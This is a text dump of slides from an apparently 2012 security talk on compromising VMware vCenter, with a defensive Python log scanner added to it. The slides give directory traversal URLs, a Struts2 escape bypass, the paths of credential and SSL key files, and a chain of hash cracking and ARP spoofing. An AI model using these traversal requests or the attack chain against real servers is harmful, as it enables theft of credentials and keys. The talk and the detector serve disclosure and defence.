How to hack VMware vCenter server in 60 seconds
- 1. How to hack VMware vCenter server in 60 seconds
Alexey Sintsov
Alexander Minozhenko
- 4. Hijacking VMware
VMware vCenter Server
• VMware vCenter Server is a solution for managing VMware vSphere
• vSphere – virtualization operating system
© 2002–2012, Digital
- 5. Hijacking VMware
Pen-test…
• VMware vCenter version 4.1 update 1
Services:
• Update Manager
• vCenter Orchestrator
• Chargeback
• Other
• Most of these services have their own web server
- 6. Hijacking VMware
VASTO and CVE-2009-1523
• Directory traversal in the Jetty web server
http://target:9084/vci/download/health.xml/%3f/../../../../FILE
• Discovered by Claudio Criscione
• Fixed in VMware Update Manager 4.1 update 1 :(
• Who wants to pay me for a 0day?
• A pentester is not a researcher?
- 8. Hijacking VMware
CVE-2010-1870
• VMware vCenter Orchestrator uses Struts2 version 2.11 (discovered by Digital Defense, Inc.)
• CVE-2010-1870: Struts2/XWork remote command execution, discovered by Meder Kydyraliev
Fixed in 4.2
- 9. Hijacking VMware
Details
• Struts2 does not properly escape '#'
• Can be bypassed with the unicode escape '\u0023'
• 2 variables need to be set for RCE:
• #_memberAccess['allowStaticMethodAccess']
• #context['xwork.MethodAccessor.denyMethodExecution']
- 10. Hijacking VMware
But what about us?
• Directory traversal in the Jetty web server … AGAIN!
http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..FILE.EXT
• Metasploit module vmware_update_manager_traversal.rb by sinn3r
• We can read any file! But what?
Claudio Criscione proposed reading vpxd-profiler-*
Sorry, patched in 4.1!
/SessionStats/SessionPool/Session/Id='06B90BCB-A0A4-4B9C-B680-FB72656A1DCB'/Username='FakeDomain\FakeUser'/SoapSession/Id='AD45B176-63F3-4421-BBF0-FE1603E543F4'/Count/total 1
Contains logs of SOAP requests with session IDs!!!
Discovered by Alexey Sintsov 8)
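A log-side check for the Update Manager traversal requests shown on the two slides above, added here as an example and not part of the original deck. It percent-decodes repeatedly (so %5C and double-encoded %252e are caught), maps backslashes to slashes, and splits off only a literal query string before decoding, so the encoded %3f in the health.xml variant stays in the path and is still flagged. The access-log lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed Jetty-style access-log lines for port 9084 (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2012:10:00:01 +0400] "GET /vci/download/health.xml HTTP/1.1" 200 512
10.0.0.9 - - [01/Jun/2012:10:00:07 +0400] "GET /vci/download/health.xml/%3f/../../../../boot.ini HTTP/1.1" 200 300
10.0.0.9 - - [01/Jun/2012:10:00:09 +0400] "GET /vci/download/.%5C..%5C..%5C..%5C..%5Cpasswd.properties HTTP/1.1" 200 201
10.0.0.9 - - [01/Jun/2012:10:00:12 +0400] "GET /vci/download/%252e%252e/%252e%252e/vpxd-profiler-1.log HTTP/1.1" 404 0
10.0.0.7 - - [01/Jun/2012:10:00:15 +0400] "GET /vci/download/update.zip HTTP/1.1" 200 99
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d"')
# A ".." segment anywhere in the normalized path is a traversal attempt.
TRAVERSAL_RE = re.compile(r'(^|/)\.\.(/|$)')


def normalize_path(raw: str) -> str:
    """Return the request path as the file system would see it.

    The literal '?' is cut off first: it separates the real query string,
    whereas an *encoded* %3f is part of the path Jetty resolved (CVE-2009-1523).
    Decoding is repeated to unwrap double encoding, then '\\' becomes '/'.
    """
    path = raw.split('?', 1)[0]
    for _ in range(3):  # bounded: stop when decoding no longer changes anything
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace('\\', '/')


def is_traversal(raw_path: str) -> bool:
    """True if a /vci/download request escapes its directory after normalization."""
    path = normalize_path(raw_path)
    return path.startswith('/vci/download') and TRAVERSAL_RE.search(path) is not None


def scan_access_log(text: str) -> list:
    """Return one record per suspicious request: client, raw path, normalized target."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_traversal(m['path']):
            hits.append({'client': line.split()[0],
                         'path': m['path'],
                         'target': normalize_path(m['path'])})
    return hits
```

Even the 404 attempt is reported, since a failed probe is still worth alerting on; the `target` field tells the responder which file was requested.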
- 11. Hijacking VMware
Attack #1
• Read vpxd-profiler via the traversal…
• Get the admins' IP addresses from it…
• Read the secret SSL key
http://target:9084/vci/downloads/...............Documents and SettingsAll UsersApplication DataVMwareVMware VirtualCenterSSLrui.key
• ARP-SPOOF with the SSL key - PROFIT
- 12. Hijacking VMware
VMware vCenter Orchestrator
• VMware vCO – software for automating configuration and management
• Installed by default with vCenter
• Has an interesting file:
C:\Program files\VMware\Infrastructure\Orchestrator\configuration\jetty\etc\passwd.properties
- 13. Hijacking VMware
VMware vCenter Orchestrator
Password disclosure
Read hash -> crack MD5 -> log on to Orchestrator -> get vCenter password
- 14. Hijacking VMware
VMware vCenter Orchestrator – more stuff
• vCO stores passwords in these files:
• C:\Program Files\VMware\Infrastructure\Orchestrator\app-server\server\vmo\conf\plugins\VC.xml
• C:\Program Files\VMware\Infrastructure\Orchestrator\app-server\server\vmo\conf\vmo.properties
Excerpt from VC.xml:
<virtual-infrastructure-host>
  <enabled>true</enabled>
  <url>https://new-virtual-center-host:443/sdk</url>
  <administrator-username>vmware</administrator-username>
  <administrator-password>010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef</administrator-password>
  <pattern>%u</pattern>
</virtual-infrastructure-host>